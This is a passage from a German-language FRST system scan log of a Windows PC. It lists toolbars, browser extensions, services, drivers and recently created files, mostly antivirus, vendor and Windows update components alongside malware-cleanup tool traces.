IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH) Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.) 
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)

FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-23]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)

Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-05-09] ()
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [187320 2017-05-22] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [113592 2017-05-23] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-05-23] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251832 2017-05-23] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [93624 2017-05-23] (Malwarebytes)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-23 18:33 - 2017-05-23 18:33 - 00019150 _____ C:\Users\Dino\Desktop\FRST.txt
2017-05-23 18:27 - 2017-05-23 18:31 - 00002088 _____ C:\Users\Dino\Desktop\SystemLook.txt
2017-05-23 18:27 - 2017-05-23 18:26 - 00165376 _____ C:\Users\Dino\Desktop\SystemLook_x64.exe
2017-05-23 18:23 - 2017-05-23 18:24 - 00025577 _____ C:\Users\Dino\Desktop\Fixlog.txt
2017-05-23 18:23 - 2017-05-23 18:23 - 00000000 ____D C:\Users\Dino\Desktop\FRST-OlderVersion
2017-05-23 17:48 - 2017-05-23 17:48 - 00000000 ___HD C:\OneDriveTemp
2017-05-22 18:25 - 2017-05-23 18:33 - 00093624 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-05-22 18:25 - 2017-05-23 18:25 - 00251832 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-05-22 18:25 - 2017-05-23 18:25 - 00113592 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-05-22 18:25 - 2017-05-23 18:25 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00187320 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\Program Files\Malwarebytes
2017-05-22 18:25 - 2017-05-09 16:37 - 00077440 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-05-22 18:15 - 2017-05-22 18:10 - 04102600 _____ C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
2017-05-22 18:13 - 2017-05-23 18:18 - 00000000 ____D C:\AdwCleaner
2017-05-21 21:26 - 2017-05-21 21:31 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.26.49_log.txt
2017-05-21 21:23 - 2017-05-21 21:24 - 00005376 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.23.57_log.txt
2017-05-21 21:19 - 2017-05-23 18:23 - 02429952 _____ (Farbar) C:\Users\Dino\Desktop\FRST64.exe
2017-05-21 21:19 - 2017-05-21 20:48 - 04922400 _____ (AO Kaspersky Lab) C:\Users\Dino\Desktop\tdsskiller.exe
2017-05-21 21:00 - 2017-05-21 21:19 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-23 18:33 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
